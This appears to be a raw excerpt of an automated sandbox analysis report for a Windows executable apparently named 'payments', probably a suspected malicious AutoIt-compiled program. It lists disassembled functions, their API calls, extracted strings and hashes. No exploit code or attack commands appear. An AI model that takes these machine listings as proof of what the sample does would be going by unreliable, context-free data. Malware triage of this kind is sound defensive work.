                                                                                                                          Function 00CFC6E9 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 447windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CFC788
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CFC83E
                                                                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00CFC859
                                                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CFCB15
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window
                                                                                                                          • String ID: 0$@U=u
                                                                                                                          • API String ID: 2326795674-975001249
                                                                                                                          • Opcode ID: 4d588053cd3e9cbda5e5e1ed898752ce6c76701695ebb69afc2c2736fed86718
                                                                                                                          • Instruction ID: 764ad056dedb21634113ef05cf0d64fd246b1ff78d7956cbaaa0a79f475a671f
                                                                                                                          • Opcode Fuzzy Hash: 4d588053cd3e9cbda5e5e1ed898752ce6c76701695ebb69afc2c2736fed86718
                                                                                                                          • Instruction Fuzzy Hash: 35F1127420430DAFE7608F24C9C5BBABBE5FF49344F084519F6A8D62A1C774DA41DBA2
                                                                                                                          Function 00C9CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __wcsnicmp
                                                                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                          • API String ID: 1038674560-86951937
                                                                                                                          • Opcode ID: e995c31840fa30f2dd18e8a9786b4f595fe0782fbb3974cf768a9f76d2e217db
                                                                                                                          • Instruction ID: 71bc852a3b8ea65e4bd24347305be24d2c15f990d80a1772334c12b820430ba9
                                                                                                                          • Opcode Fuzzy Hash: e995c31840fa30f2dd18e8a9786b4f595fe0782fbb3974cf768a9f76d2e217db
                                                                                                                          • Instruction Fuzzy Hash: D2812A316402167BCF14AF65DCDAFFF3B69AF25744F084028F909A61C2EB61DA05D2B1
                                                                                                                          Function 00CF638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(?,?,00D2DC00), ref: 00CF6449
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharUpper
                                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                          • API String ID: 3964851224-45149045
                                                                                                                          • Opcode ID: 297eaa584162884e7c26f541a3528aefda9c4fb3a09ca11446e70b6a3430160d
                                                                                                                          • Instruction ID: a2be02173ccb72c0f2a453a6f2ce7be7f86339ebbc1fcab43f1f5bd210f0ab75
                                                                                                                          • Opcode Fuzzy Hash: 297eaa584162884e7c26f541a3528aefda9c4fb3a09ca11446e70b6a3430160d
                                                                                                                          • Instruction Fuzzy Hash: 6FC1B13020420A9BCB44FF10C551A7E77A5AF95358F00485DF9966B3E2DB31EE4BEB92
                                                                                                                          Function 00CFB6C4 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 400windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CFB7B0
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB7C1
                                                                                                                          • CharNextW.USER32(0000014E), ref: 00CFB7F0
                                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CFB831
                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CFB847
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB858
                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CFB875
                                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00CFB8C7
                                                                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CFB8DD
                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CFB90E
                                                                                                                          • _memset.LIBCMT ref: 00CFB933
                                                                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CFB97C
                                                                                                                          • _memset.LIBCMT ref: 00CFB9DB
                                                                                                                          • SendMessageW.USER32 ref: 00CFBA05
                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CFBA5D
                                                                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00CFBB0A
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CFBB2C
                                                                                                                          • GetMenuItemInfoW.USER32(?), ref: 00CFBB76
                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CFBBA3
                                                                                                                          • DrawMenuBar.USER32(?), ref: 00CFBBB2
                                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00CFBBDA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                          • String ID: 0$@U=u
                                                                                                                          • API String ID: 1073566785-975001249
                                                                                                                          • Opcode ID: e8f4418969dbecf09b164b1198ed238ca5504f24dd974e13b02acd0ef5e67aca
                                                                                                                          • Instruction ID: 57d94000629491ade0ddc60058b895c7e97dffbf06ad058f078d12ddbdb87d13
                                                                                                                          • Opcode Fuzzy Hash: e8f4418969dbecf09b164b1198ed238ca5504f24dd974e13b02acd0ef5e67aca
                                                                                                                          • Instruction Fuzzy Hash: CAE18C7590021CABDF609FA1CC84EFE7B79EF05754F108156FA29AA290DB708E41DF62
                                                                                                                          Function 00CF764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CF778A
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CF779F
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CF77A6
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF7808
                                                                                                                          • DestroyWindow.USER32(?), ref: 00CF7834
                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CF785D
                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CF787B
                                                                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CF78A1
                                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00CF78B6
                                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CF78C9
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00CF78E9
                                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CF7904
                                                                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CF7918
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CF7930
                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00CF7956
                                                                                                                          • GetMonitorInfoW.USER32 ref: 00CF7970
                                                                                                                          • CopyRect.USER32(?,?), ref: 00CF7987
                                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00CF79F2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                          • Opcode ID: f5d28521ac2ae3c7b35489256b8bcd5af4eae6a9b63564fbe0bff8ff8365f560
                                                                                                                          • Instruction ID: 17ce067cc0a279c8e11c8b593279430fde9f3d964d1261f82724a3858bbdff95
                                                                                                                          • Opcode Fuzzy Hash: f5d28521ac2ae3c7b35489256b8bcd5af4eae6a9b63564fbe0bff8ff8365f560
                                                                                                                          • Instruction Fuzzy Hash: AFB1A171608305AFDB44DF64C949B6ABBE5FF88310F008A1DF5999B291DB70ED05CBA2
                                                                                                                          Function 00CD6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CD6CFB
                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CD6D21
                                                                                                                          • _wcscpy.LIBCMT ref: 00CD6D4F
                                                                                                                          • _wcscmp.LIBCMT ref: 00CD6D5A
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6D70
                                                                                                                          • _wcsstr.LIBCMT ref: 00CD6D7B
                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CD6D97
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6DE0
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6DE7
                                                                                                                          • _wcsncpy.LIBCMT ref: 00CD6E12
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                          • API String ID: 699586101-1459072770
                                                                                                                          • Opcode ID: 9d63754d496e89bc0714db690eb142684f10b76049eb0fedc8d9b814baae51f3
                                                                                                                          • Instruction ID: 06354eab2d3353757422ab12e10239bad50ff919e79de0b14705ba448cb500c4
                                                                                                                          • Opcode Fuzzy Hash: 9d63754d496e89bc0714db690eb142684f10b76049eb0fedc8d9b814baae51f3
                                                                                                                          • Instruction Fuzzy Hash: 3B41D672A002117FEB00AB65DC47EFF77BCDF55714F14006AFA01A2282EB749A05E6B2
                                                                                                                          Function 00CAA856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA939
                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00CAA941
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA96C
                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00CAA974
                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00CAA999
                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CAA9B6
                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00CAA9C6
                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CAA9F9
                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CAAA0D
                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00CAAA2B
                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00CAAA47
                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAAA52
                                                                                                                            • Part of subcall function 00CAB63C: GetCursorPos.USER32(000000FF), ref: 00CAB64F
                                                                                                                            • Part of subcall function 00CAB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB66C
                                                                                                                            • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000001), ref: 00CAB691
                                                                                                                            • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000002), ref: 00CAB69F
                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00CAAB87), ref: 00CAAA79
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                          • String ID: @U=u$AutoIt v3 GUI
                                                                                                                          • API String ID: 1458621304-2077007950
                                                                                                                          • Opcode ID: 0038a7e764f44f6e40ec486d452aa4c5f974d63ee3eeac51b2085cf1e627bc8a
                                                                                                                          • Instruction ID: 3efd46dac3e05ddebdd09ef33d95d820e908b60d1b6cd325ed4a44fd7011a421
                                                                                                                          • Opcode Fuzzy Hash: 0038a7e764f44f6e40ec486d452aa4c5f974d63ee3eeac51b2085cf1e627bc8a
                                                                                                                          • Instruction Fuzzy Hash: FFB18775A0030AAFDB14DFA8DC45BEE7BB6FB09315F114229FA15E62D0DB34A841CB61
                                                                                                                          Function 00CCEA9D Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 168windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadIconW.USER32(00000063), ref: 00CCEAB0
                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCEAC2
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00CCEAD9
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00CCEAEE
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00CCEAF4
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CCEB04
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00CCEB0A
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CCEB2B
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CCEB45
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CCEB4E
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00CCEBB9
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CCEBBF
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CCEBC6
                                                                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CCEC12
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00CCEC1F
                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CCEC44
                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CCEC6F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3869813825-2594219639
                                                                                                                          • Opcode ID: bfce4470267dfe82d254068a5b1fbc2bad9d0e4987290838472b5c5f160a759d
                                                                                                                          • Instruction ID: 81b279f380d8b3449b57538debf1260a5a4cfb474f56317a551712fc90428d6a
                                                                                                                          • Opcode Fuzzy Hash: bfce4470267dfe82d254068a5b1fbc2bad9d0e4987290838472b5c5f160a759d
                                                                                                                          • Instruction Fuzzy Hash: 6D513C71900709AFDB21DFA8CD89FAEBBF5FF05705F00492CE596A26A0CB74A945DB10
                                                                                                                          Function 00C92EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Foreground
                                                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                          • API String ID: 62970417-1919597938
                                                                                                                          • Opcode ID: 3cc58fa5b930cab918d44788476a0ea5b3c2a255f01afa286e256137d21159a3
                                                                                                                          • Instruction ID: c21cafe93e001bd405c9390dc2e6b79018a4cf9f197f9fd8ab04213b20132adf
                                                                                                                          • Opcode Fuzzy Hash: 3cc58fa5b930cab918d44788476a0ea5b3c2a255f01afa286e256137d21159a3
                                                                                                                          • Instruction Fuzzy Hash: 71D1E630505342ABCB04EF60C489ABABBB0FF54354F544A1DF49A536E1DB30E99ADBE1
                                                                                                                          Function 00CF6BC9 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 281windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00CF6C56
                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CF6D16
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                          • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                          • API String ID: 3974292440-1753161424
                                                                                                                          • Opcode ID: 3956092ce97f5e0256b11d70586b53ffdec60c19e6e37a8e65d3f72eac84a433
                                                                                                                          • Instruction ID: 727ca46efa038ab5ac643390114d2894db61b3aff0f956b416d6ad3826738546
                                                                                                                          • Opcode Fuzzy Hash: 3956092ce97f5e0256b11d70586b53ffdec60c19e6e37a8e65d3f72eac84a433
                                                                                                                          • Instruction Fuzzy Hash: 79A181302043459BCB54EF24C852B7AB3A5BF45358F10496DF9A65B3D2DB30ED05EB92
                                                                                                                          Function 00CFE731 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 129filecommemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CFE754
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CFE76B
                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CFE776
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE783
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00CFE78C
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CFE79B
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CFE7A4
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE7AB
                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CFE7BC
                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D1D9BC,?), ref: 00CFE7D5
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00CFE7E5
                                                                                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CFE809
                                                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CFE834
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CFE85C
                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CFE872
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3840717409-2594219639
                                                                                                                          • Opcode ID: ce86596c4b33a8864d53ab3a3c0e2bfb40706a1a47607f6040e36ec3fcedcebe
                                                                                                                          • Instruction ID: f864a54f5c474d083d744be1148fddad238e6d2c0bf3240742cf22cd1950f48b
